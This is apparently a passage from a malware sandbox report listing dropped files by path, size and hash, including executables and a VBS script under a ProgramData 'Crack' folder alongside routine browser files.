                                                                                                                                                                                                                                                                  4e5ef1851bc910ceeb59a63bb53725cf5d8149feff9483e960b54cc26fdc419b

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  8ef0d80259b5a38424676918f07238a76c527b643267008999dc3b2cff5c93e29ae85cbf0605f0d0b4f880fd6ae96254ebd30e5b80097eea95f5d27b5d461ff6

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_2081323541\manifest.fingerprint

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  66B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  496b05677135db1c74d82f948538c21c

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  e736e675ca5195b5fc16e59fb7de582437fb9f9a

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  df55a9464ee22a0f860c0f3b4a75ec62471d37b4d8cb7a0e460eef98cb83ebe7

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  8bd1b683e24a8c8c03b0bc041288296448f799a6f431bacbd62cb33e621672991141c7151d9424ad60ab65a7a6a30298243b8b71d281f9e99b8abb79fe16bd3c

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_2081323541\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  134B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  049c307f30407da557545d34db8ced16

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  f10b86ebfe8d30d0dc36210939ca7fa7a819d494

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  c36944790c4a1fa2f2acec5f7809a4d6689ecb7fb3b2f19c831c9adb4e17fc54

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  14f04e768956bdd9634f6a172104f2b630e2eeada2f73b9a249be2ec707f4a47ff60f2f700005ca95addd838db9438ad560e5136a10ed32df1d304d65f445780

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_2126383388\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  119B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  cb10c4ca2266e0cce5fefdcb2f0c1998

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  8f5528079c05f4173978db7b596cc16f6b7592af

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  82dff3cc4e595de91dc73802ac803c5d5e7ab33024bdc118f00a4431dd529713

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  7c690c8d36227bb27183bacaf80a161b4084e5ad61759b559b19c2cdfb9c0814ad0030d42736285ee8e6132164d69f5becdcf83ac142a42879aa54a60c6d201b

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_286652685\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  117B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  aad0631cabd2f93a24ca35c00f728145

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  ab3e9b4b93d852a1f92a3391258500a959cab687

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  3b1e777c36ece9de47e019f4967f564928ef250bb86e2c0ce691d903c73805c3

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  a9775f4947ff4560e33e1bfe8c46b47dc082e79b4ee57c04e6b89824e697655f49cb40ffa4abffbc3ea6b9d15e26ea25b0ee8e6e14b54a8789022d6294b3f32f

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_568815681\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  1003B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  578c9dbc62724b9d481ec9484a347b37

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  a6f5a3884fd37b7f04f93147f9498c11ed5c2c2d

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  005a2386e5da2e6a5975f1180fe9b325da57c61c0b4f1b853b8bcf66ec98f0a0

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  2060eb35fb0015926915f603c8e1742b448a21c5a794f9ec2bebd04e170184c60a31cee0682f4fd48b65cff6ade70befd77ba0446cc42d6fe1de68d93b8ea640

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_660659149\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  53B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  22b68a088a69906d96dc6d47246880d2

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  06491f3fd9c4903ac64980f8d655b79082545f82

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  94be212fe6bcf42d4b13fabd22da97d6a7ef8fdf28739989aba90a7cf181ac88

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  8c755fdc617fa3a196e048e222a2562622f43362b8ef60c047e540e997153a446a448e55e062b14ed4d0adce7230df643a1bd0b06a702dc1e6f78e2553aadfff

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_6663396\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  176B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  6607494855f7b5c0348eecd49ef7ce46

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  2c844dd9ea648efec08776757bc376b5a6f9eb71

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  37c30639ea04878b9407aecbcea4848b033e4548d5023ce5105ea79cab2c68dd

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  8cb60725d958291b9a78c293992768cb03ff53ab942637e62eb6f17d80e0864c56a9c8ccafbc28246e9ce1fdb248e8d071d76764bcaf0243397d0f0a62b4d09a

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_94072451\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  116B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  2188c7ec4e86e29013803d6b85b0d5bb

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  5a9b4a91c63e0013f661dfc472edb01385d0e3ce

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  ac47cc331bb96271da2140941926a8accc6cb7599a6f3c17bd31c78f46709a62

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  37c21eaff24a54c2c7571e480ff4f349267e4404111508f241f54a41542ce06bcde4c830c6e195fc48d1bf831ed1fe78da361d1e43416cfd6c02afa8188af656

                                                                                                                                                                                                                                                                • C:\Program Files\chrome_Unpacker_BeginUnzipping4164_98857137\manifest.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  145B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  465cc76a28cc5543a0d845a8e8dd58fa

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  adbe272f254fd8b218fcc7c8da716072ea29d8ba

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  e75fb1fa1692e9720166872afe6d015e4f99d4e8725463e950889a55c4c35bb9

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  a00286cd50d908883a48f675d6291881ad8809dcae5aca55d5d581e6d93a66058e1fe9e626852bf16e5bb0c693a088a69d9876ccac288181b1f74254bf1da1a2

                                                                                                                                                                                                                                                                • C:\ProgramData\Crack\Launcher.exe

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  62KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  f0b9744b11019035089e67c049788e05

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  0cd7ce24259419aeb152d17aa92d329141af7354

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  4f0affe87057a9fbe547a4243efb1e292a0da9310c9131c43bb5a41a84158c42

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  ebffeff94eb55d44ddbb6c449ade1623e82dc774db045c8164b8590205e6b65df82ab2515c96accc1790838e293b8f16dd86642f5e7b3f1eabe3807cb9d2ef89

                                                                                                                                                                                                                                                                • C:\ProgramData\Crack\explorer.exe

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  74KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  4867858a1ae2461a32bc629a432c0b79

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  22566f817baa002b4bada14697492e6ae8b5f0a5

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  29549f9b6f964a2defb76242d32b6552154a4d90df56917ae44180488cbf78cc

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  6fa39ac954bcf6aee601acb3314c67c2441d62972b025497b99bc814426d2e92384fae2f7635984834439ed9296492578250d0c6e712f0c733097bc1dbf1857c

                                                                                                                                                                                                                                                                • C:\ProgramData\Crack\explorerS.exe

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2.7MB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  bcf34d5d740fd50fac73006357048bd4

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  1ca37fed2ea277539c1c750b000d340880bb0437

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  898890afa7237d362f6db7b476ccc1da6585b0fb205cc32f7e0639348dcbd074

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  fb5ae8c28d3c645d2165d862bd820150b7fc9a2e156e23aba85484f3c046d1bead65217149afd6878be0c508775ef57929b6b5c0d6df97735272343f1c55d813

                                                                                                                                                                                                                                                                • C:\ProgramData\Crack\start.exe

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  850KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  0ff85720bf2daae51911715015d1fb7f

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  df880a5055ef5882d457c63159c82ef740324433

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  1270600afe02d5ee0c4ccaf747476f810f5f442b37d28134ca41bdb7fa593cb0

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  6cccc4d0da396909795693f17180462397668329672b0b9ec1419b9b2cdd57f6314205c7de2c9da2137f6548a31280c1868c1518ed16e298919f295b86fee60c

                                                                                                                                                                                                                                                                • C:\ProgramData\Crack\temp.vbs

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  93B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  a0348f803567d24424d4c6856bade7dd

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  55d669023a09c4a4e022c341eceebe40f9d5b430

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  b9f1f26f5760fa436bf0ae69c71e72359de9e5326ec8af03eec5bd96cff3ac9c

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  fb99c9dcba3cd076b3b19303264f468387b7080f19041191a8bba7de08ec5ac71871150855012d5212b5dfab4bfe59aac03533937900f4e1b755eb1800322c15

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.9\protocols.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  f9fd82b572ef4ce41a3d1075acc52d22

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  fdded5eef95391be440cc15f84ded0480c0141e3

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  5f21978e992a53ebd9c138cb5391c481def7769e3525c586a8a94f276b3cd8d6

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  17084cc74462310a608355fbeafa8b51f295fb5fd067dfc641e752e69b1ee4ffba0e9eafa263aab67daab780b9b6be370dd3b54dd4ba8426ab499e50ff5c7339

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.15\autofill_bypass_cache_forms.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  175B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  8060c129d08468ed3f3f3d09f13540ce

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  f979419a76d5abfc89007d91f35412420aeae611

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  b32bfdb89e35959aaf3e61ae58d0be1da94a12b6667e281c9567295efdd92f92

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  99d0d9c816a680d7c0a28845aab7e8f33084688b1f3be4845f9cca596384b7a0811b9586c86ba9152de54cafcdea5871a6febbee1d5b3df6c778cdcb66f42cfa

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.15\edge_autofill_global_block_list.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  4KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  afb6f8315b244d03b262d28e1c5f6fae

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  a92aaff896f4c07bdea5c5d0ab6fdb035e9ec71e

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  a3bcb682dd63c048cd9ca88c49100333651b4f50de43b60ec681de5f8208d742

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  d80e232da16f94a93cfe95339f0db4ff4f385e0aa2ba9cbd454e43666a915f8e730b615085b45cc7c029aa45803e5aca61b86e63dac0cf5f1128beed431f9df0

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.1.15\v1FieldTypes.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  509KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  c1a0d30e5eebef19db1b7e68fc79d2be

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  de4ccb9e7ea5850363d0e7124c01da766425039c

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  f3232a4e83ffc6ee2447aba5a49b8fd7ba13bcfd82fa09ae744c44996f7fcdd1

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  f0eafae0260783ea3e85fe34cc0f145db7f402949a2ae809d37578e49baf767ad408bf2e79e2275d04891cd1977e8a018d6eeb5b95e839083f3722a960ccb57a

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  280B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  01cc3a42395638ce669dd0d7aba1f929

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  89aa0871fa8e25b55823dd0db9a028ef46dfbdd8

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  d0c6ee43e769188d8a32f782b44cb00052099222be21cbe8bf119469c6612dee

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  d3b88e797333416a4bc6c7f7e224ba68362706747e191a1cd8846a080329473b8f1bfebee5e3fe21faa4d24c8a7683041705e995777714330316e9b563d38e41

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  7c347d037bd2ffcde60aab11a18edde3

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  efe5a21d39b073762ffe4450e88729dcd6a67c8f

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  428f5e2796974e0c14e32027da2b67e35e6d4ab8c6530c651dcb41a828c065e9

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  09fd163db7b8e87c3c15a368992c8b19dc8d4597b7ea92f74d295aec1e7fa5509576b2c4021f05205822871b174cc56a80882cca7b44e7e9d6b4ff73794ca009

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe583330.TMP

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  3KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  0c0b6411a24dbc0e5dfdb25f4d4a299d

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  2298eb6c30cfa8b7320a394d588f0fac975c475d

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  8a07697700a34ff1aef360da153a9d1f4bc2c0ffaca557cfe15015a96e84ea5a

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  19277a37b2005f2fb13236f91671094826de25531810193ad8f2b8412d24b0e3e72a4e05967d728ad1ebb8cfb4b69435be37621c7ca89d4993317a262b29b926

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  99914b932bd37a50b983c5e7c90ae93b

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  107KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  2b66d93c82a06797cdfd9df96a09e74a

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  5f7eb526ee8a0c519b5d86c845fea8afd15b0c28

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  d4c064db769b3c109da2ed80a53fbab00987c17421a47921e41e213781d67954

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  95e45c0aea0e704be5f512dffaae377d4abef78da99b3bca769264d69be20f2570daf2f47905645217e1b2696e42b101f26149219f148b4d6dd97a6c2868b6f5

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  ee6fef588eda8b5b0f46c47fa741c4a0

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  480d4e49d456a746bfefe29a48ac6a6410f4fd4a

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  eb750e814f2ed7bf06bc33f8e2a5c368166adb23a163c85cc507c2062781e9b8

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  d664ebbf233984af7a34e9da9e5a5e9ea8c0cdc12ed7a7e33b8eb880713cd8f1307974772ab5c42fc5d90396c486ac2d21326e6353e83bb28be69d5cfde18169

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  2fd73fc3df1c8d86695e4681735133b4

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  c88364b562d4fa9964ad4c7315d63e453fa6a256

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  0d1dd2785551c205e1cb3a10cb166e5caf64ef76776cc8fd33c0440e04d0a8e6

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  1154e5c88110243d6fd1cf7c441df5a74c25696c0d5c92e1e1d45fd1e77bf2b703b1101257f9767597ed224ab02d8118db0f2d3842a1a4f7aa9d834c660db364

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  f81516e44433ea074087a628d3dc1d2e

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  8dc53207d646533de0b7106a026939324af5130e

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  80dec9628d519e0d60f3a15500d502d6a9aa9bbecd2a7b3d019671cfd2490d37

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  b5cb5cc22e4a0e574192fc460ea597d8ac6688996990a385f8cc24d03c448e8a6f6d3dfd7abb398b22e57149e6bc793d756e79dd6653c939c7744b6dd25d1e68

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  2B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  d751713988987e9331980363e24189ce

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  97d170e1550eee4afc0af065b78cda302a97674c

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  40B

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  20d4b8fa017a12a108c87f540836e250

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  16KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  5b42a0cea22bb13fc2c703ce89384001

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  9b178ab4002d1872564d59708da34dc29f8f2486

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  1d7c17a46315eedd22e89bae82ece04c43485aeadf77963778d42ae94db0578a

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  48dd36941d3065afb6146e34cc5fbc88fb116f5e9b6307d6f3082da8563cc3b49fd8a84d8cada266bfb2d5de0090dc15e5777267907216a7f4d6c7e7b08775a2

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  15KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  740f94ab46ebdd21c2bed47f04f81a4a

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  ce777b753e8e8837ae50fbf99b51c0a33eb356f2

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  8029aab01f2cd0c6c5f625686a37f0eb387af45e885245d9585fc57d7d423813

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  39ff9fdf0f7028a70585fb62dd30944bf16a6dd69f852037fbcabc6401f55cdc3ae1c010122ff8f3612ad15410ab04ca76d052f63dd345f5d3c21008e4aff105

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  15KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  d714721f1cd1cbc6af720f1552350228

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  4b448ccaac701de3a4dde1eea31b3790d7bd2401

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  45cf6ac0e840e51292f4990a08173c26af1c7d68328dccdc360bba8c63205f63

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  076d6817bdf485342abfd293544ae5026bf4ea43b35d062e5eb3692c09c85e623b76bc3100299b1c07db1a50217a6d9864df87398a14f0e413038fddab7c9ef6

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  16KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  3253cce83ae17015269c168693eb0361

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  4bf3a93e34d6b0bc64e6a0ae4d3a04fadc218448

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  4792b2a268408aca9b943f802b79fed9519f9c27859e7f20ca9d76b84da7bd77

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  a59de3e518ee7a81348360b275c7ba4de2c01daa2bb9bb90f9a0d1e6316f356d4f9de7820032485c540757f229939eeacc36c2db88dc2252a30496d4f0ee4b77

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                  2b14642eae1d0bdfeb742d59beef5938

                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                  49a016481fb72d3488960add681c674fd69f71e4

                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                  bc61f7ba934542bc872703e451671ce11788a778f3ef8750860ff1986c088b2b

                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                  35d0d07d0d4058027506a862b245a5cae9704a0394664ea53191ee0eb6e6a978a1c990b9b73aa4e1f6b64abe8c7139c9a15780d32f6820d6289a15ecb68dd201

                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                  22KB

                                                                                                                                                                                                                                                                  MD5

